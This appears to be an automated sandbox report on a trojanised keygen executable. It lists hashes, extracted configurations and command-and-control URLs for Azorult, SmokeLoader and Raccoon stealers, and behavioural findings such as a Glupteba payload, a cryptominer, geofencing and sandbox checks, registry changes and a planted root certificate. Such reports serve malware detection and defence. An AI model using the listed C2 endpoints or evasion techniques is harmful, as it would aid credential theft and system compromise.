Analysis
-
max time kernel
19s -
max time network
303s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 11:55
Static task
static1
Behavioral task
behavioral1
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
Resource
win10v20201028
General
-
Target
Aster.7.1.2.4.16.11.3.1.2.6.v.keygen.by.CORE.exe
-
Size
5.2MB
-
MD5
9e12e3e503674039878cb7542a30f33c
-
SHA1
789b75006358e62cff26877e4fc5fdd31f7e8a76
-
SHA256
714b89115f9f4b3979e2f70ad6eb9e7d81fbcd8a8c984d7271adf01c8ecbcd36
-
SHA512
0091f4b40a06cadb0e12f1066dcb2c79a0ffa60bcc873761751e3f7feb85e30a38ba29cbbb29f3f32fa810236055044978533186942c07d0070e64b3e4dac544
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5444-201-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5444-205-0x00000000025B0000-0x0000000002EBA000-memory.dmp family_glupteba behavioral2/memory/5444-208-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/2096-143-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/2096-142-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/2096-156-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/2096-213-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 1004 keygen-pr.exe 1548 keygen-step-1.exe 2464 keygen-step-3.exe 1112 keygen-step-4.exe 1100 key.exe 1984 Setup.exe 3948 multitimer.exe 3560 setups.exe 1220 askinstall20.exe 1116 setups.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1116 setups.tmp 1116 setups.tmp 1116 setups.tmp 1116 setups.tmp 1116 setups.tmp 1116 setups.tmp 1116 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 204 ip-api.com 328 ipinfo.io 332 ipinfo.io 158 ipinfo.io 166 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
pid pid_target Process procid_target 1984 6104 WerFault.exe 145 3084 5920 WerFault.exe 148 6148 5920 WerFault.exe 148 5460 5920 WerFault.exe 148 6152 5920 WerFault.exe 148 6196 5920 WerFault.exe 148 6904 5920 WerFault.exe 148 6676 5920 WerFault.exe 148 6244 5920 WerFault.exe 148 3356 5920 WerFault.exe 148 6392 5920 WerFault.exe 148 4100 5920 WerFault.exe 148 3172 5920 WerFault.exe 148 3472 5920 WerFault.exe 148 3504 5864 WerFault.exe 134 6660 6536 WerFault.exe 274 -
Delays execution with timeout.exe 5 IoCs
pid Process 2460 timeout.exe 6024 timeout.exe 6780 timeout.exe 7384 timeout.exe 3484 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 6 IoCs
pid Process 1420 taskkill.exe 5504 taskkill.exe 6572 taskkill.exe 5780 taskkill.exe 3996 taskkill.exe 4120 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000365d7f4920df0c1058c5a7d8a3cebc56de7ebc8e340a31e22594e87e53723207bf63f3a78beb04da304043832a7ebd138d0f809c69771f711fedc4051e861ab632c72334f3e07b3afeff45dbaa286f73bc3c85f051ee407b877f MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000053eb557b5388fd723c5a42eceac69865d503a85ba51dade9a897456bc2d278e965c8b47ca7b5904fc1a8faf134a6df0f297c771c41bcec1744c3f38d78521b5e274582a22d44326b631387a98a47e5504a8a4fa798a93f8da1ff53540ab2093ff257dd5c96145f75eaa2db066dcc35a91219a0310bee85a93a416400abd5beca50f7a35d443cbfa4723d014ee10addbf9a36820d8d635be527a361e75dc45948cd2ff65529bbb39143d4bf94062608852cff0b4e5f4049bd0406a815e28012c420e4f564987c54fa09846ce98f038578843d2a12e379affa698c42513c1f3c56c63b401ee2823c8fdd49458c3dcc2c470a10b8530bf22d633210f062ac76e4645713f33f49ed0c8e7915f867a4582e5e987b687c2ab8a77f47abc9e455a80a003d8a9df550ad80e68705e4df54aa9456c974abab31d7092e2457c3f599a93dd2a38a809b98ac43d440f5ac77f0d6b980a6fd906dc34805b59216e6c31a710f4db305739833fbf78120f8859ddac4b39b4b021ac3510c818a1ad585338a128729662cb80614a5f51e410edf25349877e3bfb8a4f16d1ebed01df5c3d118751bfbb5aa8306fad MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = eaf36e034a29d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000097d293d0ff42204ad14d8b7c681989748ff2825923b3ab935c8d1efaa8aa6ed7be4e34df846eb1333febffd14495772277d288325fb3cbb976bf MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a8648